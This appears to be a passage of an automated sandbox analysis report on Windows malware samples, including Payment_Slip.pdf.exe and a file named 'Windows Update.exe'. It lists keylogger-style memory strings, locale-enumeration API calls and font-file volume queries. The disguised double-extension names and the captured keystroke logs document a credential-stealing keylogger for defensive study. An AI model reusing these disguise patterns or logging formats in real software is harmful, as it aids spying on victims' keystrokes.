                              Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}rTH
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>rTH
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.drBinary or memory string: [Program Manager]
                              Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQz(
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>rTH
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br>
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>LR
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br>t-
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r@\
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>TH
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br>t-
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>TH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}TH
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004329DA cpuid 11_2_004329DA
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: EnumSystemLocalesW,11_2_0044F17B
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: EnumSystemLocalesW,11_2_0044F130
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: EnumSystemLocalesW,11_2_0044F216
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0044F2A3
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetLocaleInfoA,11_2_0040E2BB
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetLocaleInfoW,11_2_0044F4F3
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_0044F61C
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetLocaleInfoW,11_2_0044F723
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0044F7F0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: EnumSystemLocalesW,11_2_00445914
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetLocaleInfoW,11_2_00445E1C
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_0044EEB8
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: EnumSystemLocalesW,17_2_0044F17B
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: EnumSystemLocalesW,17_2_0044F130
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: EnumSystemLocalesW,17_2_0044F216
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_0044F2A3
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetLocaleInfoA,17_2_0040E2BB
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetLocaleInfoW,17_2_0044F4F3
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0044F61C
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetLocaleInfoW,17_2_0044F723
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_0044F7F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: EnumSystemLocalesW,17_2_00445914
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetLocaleInfoW,17_2_00445E1C
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_0044EEB8
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Users\user\Desktop\Payment_Slip.pdf.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
